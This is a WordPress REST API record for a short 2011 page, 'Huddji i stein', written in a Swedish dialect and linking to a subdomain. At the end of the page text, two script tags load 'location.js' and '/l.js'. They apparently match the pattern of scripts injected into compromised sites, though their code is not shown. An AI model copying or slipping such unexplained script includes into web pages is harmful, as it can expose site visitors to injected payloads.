{"id":307,"date":"2011-04-14T06:25:39","date_gmt":"2011-04-14T04:25:39","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=307"},"modified":"2011-04-14T06:25:39","modified_gmt":"2011-04-14T04:25:39","slug":"huddji-i-stein","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/huddji-i-stein\/","title":{"rendered":"Huddji i stein"},"content":{"rendered":"<p>T\u00e5m s\u00e5m f\u00f6rstaar te rikti spr\u00e5\u00e5tji kan ju sii opa<\/p>\n<p><a href=\"http:\/\/huddji.Hindersby.net\">Huddji i stein<\/a> (http:\/\/huddji.Hindersby.net)<\/p>\n<p>Tii e eitt \u00e5 ana fr\u00e5\u00e5n j\u00e4\u00e4r \u00e5mkring \u00e5 leng\u00e4r ifr\u00e5\u00e5n.<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>T\u00e5m s\u00e5m f\u00f6rstaar te rikti spr\u00e5\u00e5tji kan ju sii opa Huddji i stein (http:\/\/huddji.Hindersby.net) Tii e eitt \u00e5 ana fr\u00e5\u00e5n j\u00e4\u00e4r \u00e5mkring \u00e5 leng\u00e4r ifr\u00e5\u00e5n.<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":10,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-307","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=307"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/307\/revisions"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}